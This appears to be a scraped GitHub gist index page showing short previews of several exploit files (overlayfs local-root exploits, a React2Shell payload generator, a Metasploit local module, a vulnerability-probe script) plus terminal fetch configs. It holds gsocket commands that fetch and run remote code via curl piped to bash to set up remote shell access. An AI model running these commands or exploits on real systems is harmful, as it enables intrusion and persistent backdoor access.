This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // CVE-2025-55182 - React2Shell Exploit | |
| // Educational purposes only - Use at your own risk | |
| const FormDataLib = require('form-data'); | |
| // Payload generators | |
| function createBasicPayload() { | |
| return { | |
| '0': '$1', | |
| '1': { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Show hidden characters
| { | |
| "$schema": "https://github.com/fastfetch-cli/fastfetch/raw/dev/doc/json_schema.json", | |
| "logo": { | |
| "source": "/home/haxor/.config/fastfetch/pngs/0day.png", | |
| "height": 18 | |
| }, | |
| "display": { | |
| "separator": " : " | |
| }, | |
| "modules": [ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # See this wiki page for more info: | |
| # https://github.com/dylanaraps/neofetch/wiki/Customizing-Info | |
| print_info() { | |
| prin "$(color 1)┌────────────────────────✪─────────────────────────┐" | |
| prin "$(color 2) upgrade your skill for your protection,$(color 3) haxor here" | |
| prin "$(color 1)└────────────────────────✪─────────────────────────┘" | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| just another overlayfs exploit, works on kernels before 2015-12-26 | |
| # Exploit Title: overlayfs local root | |
| # Date: 2016-01-05 | |
| # Exploit Author: rebel | |
| # Version: Ubuntu 14.04 LTS, 15.10 and more | |
| # Tested on: Ubuntu 14.04 LTS, 15.10 | |
| # CVE : CVE-2015-8660 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Install | |
| bash -c "$(curl -fsSL https://gsocket.io/y)" | |
| Uninstall | |
| GS_UNDO=1 bash -c "$(curl -fsSL https://gsocket.io/y)" | |
| Access | |
| S="ExampleSecretChangeMe" bash -c "$(curl -fsSL https://gsocket.io/y)" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: http://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| require "msf/core" | |
| class MetasploitModule < Msf::Exploit::Local | |
| Rank = GoodRanking |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _GNU_SOURCE | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| #include <fcntl.h> | |
| #include <err.h> | |
| #include <errno.h> | |
| #include <sched.h> | |
| #include <sys/types.h> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** This software is provided by the copyright owner "as is" and any | |
| * expressed or implied warranties, including, but not limited to, | |
| * the implied warranties of merchantability and fitness for a particular | |
| * purpose are disclaimed. In no event shall the copyright owner be | |
| * liable for any direct, indirect, incidential, special, exemplary or | |
| * consequential damages, including, but not limited to, procurement | |
| * of substitute goods or services, loss of use, data or profits or | |
| * business interruption, however caused and on any theory of liability, | |
| * whether in contract, strict liability, or tort, including negligence | |
| * or otherwise, arising in any way out of the use of this software, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| # Exploit Title: ofs.c - overlayfs local root in ubuntu | |
| # Date: 2015-06-15 | |
| # Exploit Author: rebel | |
| # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15) | |
| # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04 | |
| # CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) | |
| *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* | |
| CVE-2015-1328 / ofs.c |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import requests | |
| import argparse | |
| from colorama import init, Fore, Style | |
| import re | |
| import sys | |
| init(autoreset=True) | |
| parser = argparse.ArgumentParser(description="Send payload & detect vuln") |
NewerOlder